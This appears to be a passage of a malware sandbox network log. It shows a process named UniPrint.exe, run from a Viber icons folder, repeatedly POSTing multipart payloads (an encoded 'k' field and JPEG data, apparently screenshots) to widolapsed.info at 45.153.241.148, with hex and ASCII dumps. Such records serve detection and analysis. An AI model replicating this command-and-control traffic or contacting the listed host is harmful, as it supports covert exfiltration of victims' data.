                                                                                                      2021-09-15 11:45:29 UTC358OUTData Raw: 86 4f 17 59 f5 2d b6 a1 72 ff 00 7a 56 fc e9 be 74 8d d5 c9 fc 6a bd 39 6a fd 9c 56 c8 95 5a 6f 76 4b b8 9e a4 d2 e6 9a 29 69 58 b5 26 c7 53 85 37 34 b9 a4 5a 63 b3 4e 06 a3 a7 8a 4d 14 98 fa 51 4d 14 b5 26 89 8e a7 0a 60 34 ec 8a 45 26 3b 34 e1 4c cd 2e 4d 4b 45 a6 49 45 34 13 4b f5 34 9a 29 31 e2 97 22 a3 de 83 ab 0f ce 98 d7 30 27 57 06 97 2b 0e 74 ba 96 41 f9 4f d2 b8 cf 14 7f c7 ec 5f f5 c8 57 4c 75 28 17 20 64 d7 33 e2 53 9b b8 4f fd 32 1f ce aa 31 6b 70 53 52 96 87 17 45 15 b9 78 52 1f 0b e9 c6 39 74 f8 de 68 5c bc 6f 6a 1a 69 4f 9a c3 21 f6 1c 60 0f ef 0e 95 c0 dd ac 7a e9 5c c4 a5 0c ca ac 15 88 0c 30 c0 1e bd eb aa d5 20 b7 93 c5 13 5a 93 61 2d bd b9 9a 41 6d 6d 6d e5 30 d8 85 82 3b 04 5c e7 18 e0 9e f5 56 d9 5f 50 8e d2 4b 85 d3 1e 3b c3 35 ba
                                                                                                      Data Ascii: OY-rzVtj9jVZovK)iX&S74ZcNMQM&`4E&;4L.MKEIE4K4)1"0'W+tAO_WLu( d3SO21kpSRExR9th\ojiO!`z\0 Za-Ammm0;\V_PK;5
                                                                                                      2021-09-15 11:45:29 UTC374OUTData Raw: 28 aa 7e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 23 fe 9a 0e 75 fd 26 5c a2 a9 f9 9a 9f fc fa 5a 7f e0 53 7f f1 ba 3c cd 4f fe 7d 2d 3f f0 29 bf f8 dd 1c 8f fa 68 39 d7 f4 99 72 8a a7 e6 6a 7f f3 e9 69 ff 00 81 4d ff 00 c6 e8 f3 35 3f f9 f4 b4 ff 00 c0 a6 ff 00 e3 74 72 3f e9 a0 e7 5f d2 65 ca 2a 9f 99 a9 ff 00 cf a5 a7 fe 05 37 ff 00 1b a3 cc d4 ff 00 e7 d2 d3 ff 00 02 9b ff 00 8d d1 c8 ff 00 a6 83 9d 7f 49 97 28 aa 7e 66 a7 ff 00 3e 96 9f f8 14 df fc 6e 8f 33 53 ff 00 9f 4b 4f fc 0a 6f fe 37 47 23 fe 9a 0e 75 fd 26 5c a2 a9 f9 9a 9f fc fa 5a 7f e0 53 7f f1 ba 64 b7 77 d0 04 79 ed 2d 84 6d 22 21 29 70 c4 8d cc 17 38 28 33 d7 d6 9f 23 fe 9a 17 3a fe 93 2f d1 45 15 05 85 79 5f c5 8f f9 0c d9 7f d7 03 fc eb d5 2b ca fe
                                                                                                      Data Ascii: (~f>n3SKOo7G#u&\ZS<O}-?)h9rjiM5?tr?_e*7I(~f>n3SKOo7G#u&\ZSdwy-m"!)p8(3#:/Ey_+
                                                                                                      2021-09-15 11:45:29 UTC390OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 33 35 36 32 38 33 38 33 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3135628383--
                                                                                                      2021-09-15 11:45:30 UTC390INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:29 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=794ba9da7d30af93b6fc902d2891bc2702299c6e807298e370a1b3f70798c8de; expires=Thu, 15-Sep-2022 11:45:29 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:30 UTC390INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      40192.168.2.34983145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:50 UTC3087OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76646
                                                                                                      Content-Type: multipart/form-data; boundary=--------3817058548
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:50 UTC3087OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 38 31 37 30 35 38 35 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3817058548Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:50 UTC3087OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 92 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:50 UTC3087OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:50 UTC3103OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:50 UTC3119OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:50 UTC3135OUTData Raw: 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b 9a 5c d2 2d 31 d9 a7 03 51 d3 c5 26 8a 4c 7d 28 a6 8a 5a 93 44 c7 53 85 30 1a 76 45 22 93 1d 9a 70 a6 66 97 26 a5 a2 d3 24 a2 9a 09 a5 fa 9a 4d 14 98 f1 4b 91 51 ef 41 d5 87 e7 4c 6b 98 13 ab 83 4b 95 87 3a 5d 4b 20 fc a7 e9 5c 67 8a 3f e3 f6 2f fa e4 2b a6 3a 94 0b 90 32 6b 99 f1 29 cd dc 27 fe 99 0f e7 55 18 b5 b8 29 a9 4b 43 8b a2 8a dc bc 29 0f 85 f4 e3 1c ba 7c 6f 34 2e 5e 37 b5 0d 34 a7 cd 61 90 fb 0e 30 07 f7 87 4a e0 6e
                                                                                                      Data Ascii: X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc\-1Q&L}(ZDS0vE"pf&$MKQALkK:]K \g?/+:2k)'U)KC)|o4.^74a0Jn
                                                                                                      2021-09-15 11:46:50 UTC3151OUTData Raw: a2 8a 00 28 a2 8a 00 28 a2 8a 00 5a 29 05 2d 31 05 2d 25 19 a0 05 a2 93 34 50 02 d1 9a 4a 28 01 73 45 25 2d 02 0a 28 a2 80 0a 5a 4a 5a 60 14 b4 94 50 02 f7 a2 8a 28 00 a2 92 96 98 0b 45 25 14 08 5a 29 29 68 01 68 a4 a2 98 85 a2 8a 28 01 69 28 cd 14 00 b4 51 45 00 14 b4 94 50 02 d0 29 29 69 88 5a 33 49 45 31 0b 9a 33 49 45 00 3b 34 53 69 68 b8 58 5a 33 49 9a 4c d1 70 b0 ec d1 9a 6e 68 a2 e1 61 f9 a3 34 da 33 4e e2 b0 ec d2 66 9b 4b 9a 57 1d 85 cd 2e 69 b4 99 a2 e1 61 d4 66 93 34 51 70 b0 ec d2 1a 4a 33 4e e1 60 a2 92 8a 40 2d 19 a4 a2 80 b0 b9 a2 9b 9a 33 4a e3 b0 b5 d8 f8 03 56 b3 d1 6d 75 ab db e9 36 a2 ac 01 54 72 d2 37 ef 30 aa 3b 9f ff 00 59 c0 04 d7 19 9a 4c 0c e7 03 3e b5 13 8f 32 b1 70 97 2b b9 d9 78 ff 00 57 b5 d4 6e 60 54 d3 b0 e6 18 e6 b6 bd 13
                                                                                                      Data Ascii: ((Z)-1-%4PJ(sE%-(ZJZ`P(E%Z))hh(i(QEP))iZ3IE13IE;4SihXZ3ILpnha43NfKW.iaf4QpJ3N`@-3JVmu6Tr70;YL>2p+xWn`T
                                                                                                      2021-09-15 11:46:50 UTC3162OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 38 31 37 30 35 38 35 34 38 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3817058548--
                                                                                                      2021-09-15 11:46:50 UTC3162INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:50 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=cb6ef9a4c506285ad9bea51bb69448cc50b60d3866c545b924977e8a9c20c620; expires=Thu, 15-Sep-2022 11:46:50 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:50 UTC3162INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      41192.168.2.34983245.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:51 UTC3162OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76655
                                                                                                      Content-Type: multipart/form-data; boundary=--------1585944860
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:51 UTC3163OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 35 38 35 39 34 34 38 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1585944860Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:51 UTC3163OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 8b d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:51 UTC3163OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:51 UTC3179OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:51 UTC3195OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:51 UTC3211OUTData Raw: 9e 97 b7 ec 99 4b 0c fa b4 8c 9c 53 c4 6e 78 0a 4f e1 5a 27 52 d3 e3 ff 00 57 6a 4f d6 90 eb 81 7f d5 5a c6 3e b4 7b 4a 8f 68 87 b0 a6 b7 91 51 6d 27 6e 91 9f ca ad da 69 b7 1e 68 62 87 ad 46 da ed d1 fb a1 17 e8 29 89 aa de 3c 8b 99 4e 09 ec 2a 64 ab 34 69 4d 50 8c 96 ec b9 e3 35 db 0d a8 3e 95 cb e9 ff 00 f2 11 b7 ff 00 ae 8b 5d 37 8c 49 6b 6b 42 7a 95 ae 67 4f ff 00 90 8d bf fd 74 1f ce 96 1f f8 07 5d 6f e3 1e 85 a8 a5 b9 98 34 d2 85 38 e9 54 8c da 6c 7d 5c 9a ad e2 42 45 ea e0 ff 00 0d 62 f5 ef 58 50 a1 cd 04 db 27 13 8c e4 a8 e2 a2 74 07 53 d3 d3 ee 44 4d 30 eb 91 2f fa bb 71 58 54 56 eb 0b 0e a7 23 c7 d5 e8 6c 36 bf 37 f0 46 a2 a0 7d 66 ed ba 36 3e 95 9d 45 52 c3 d3 5d 0c 9e 2e b3 ea 5b 6d 42 e5 fe f4 ad f9 d3 7c e9 1b ab 93 f8 d5 7a 72 d5 fb 38 ad
                                                                                                      Data Ascii: KSnxOZ'RWjOZ>{JhQm'nihbF)<N*d4iMP5>]7IkkBzgOt]o48Tl}\BEbXP'tSDM0/qXTV#l67F}f6>ER].[mB|zr8
                                                                                                      2021-09-15 11:46:51 UTC3227OUTData Raw: 51 45 00 14 51 45 30 16 8a 4a 28 01 69 29 68 a0 04 a2 8a 28 00 a2 8a 28 01 68 a4 a2 80 16 96 9b 4b 40 85 a4 a2 8a 00 5c d1 49 45 00 2d 14 94 50 02 d1 45 14 00 b4 52 52 d3 10 52 d2 51 4c 02 8a 28 a4 01 45 14 50 01 45 14 50 01 4b 49 45 00 2d 14 94 b4 c0 28 a2 8a 04 2d 14 94 50 02 d1 49 45 00 2d 14 94 50 02 d1 45 14 00 51 45 14 c4 2d 25 14 50 02 d1 45 14 00 51 45 14 00 51 45 14 00 b4 52 0a 5a 62 0a 5a 4a 33 40 0b 45 26 68 a0 05 a3 34 94 50 02 e6 8a 4a 5a 04 14 51 45 00 14 b4 94 b4 c0 29 69 28 a0 05 ef 45 14 50 01 45 25 2d 30 16 8a 4a 28 10 b4 52 52 d0 02 d1 49 45 31 0b 45 14 50 02 d2 51 9a 28 01 68 a2 8a 00 29 69 28 a0 05 a0 52 52 d3 10 b4 66 92 8a 62 17 34 66 92 8a 00 76 68 a6 d2 d1 70 b0 b4 66 93 34 99 a2 e1 61 d9 a3 34 dc d1 45 c2 c3 f3 46 69 b4 66 9d c5
                                                                                                      Data Ascii: QEQE0J(i)h((hK@\IE-PERRRQL(EPEPKIE-(-PIE-PEQE-%PEQEQERZbZJ3@E&h4PJZQE)i(EPE%-0J(RRIE1EPQ(h)i(RRfb4fvhpf4a4EFif
                                                                                                      2021-09-15 11:46:51 UTC3237OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 35 38 35 39 34 34 38 36 30 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1585944860--
                                                                                                      2021-09-15 11:46:52 UTC3237INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:51 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=34dcf45251fe7ac053bd429bbfba9697f5afaa35d044a3b774f14a3b89a76507; expires=Thu, 15-Sep-2022 11:46:51 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:52 UTC3238INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      42192.168.2.34983345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:52 UTC3238OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76672
                                                                                                      Content-Type: multipart/form-data; boundary=--------1049848244
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:52 UTC3238OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 30 34 39 38 34 38 32 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1049848244Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:52 UTC3238OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 b8 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
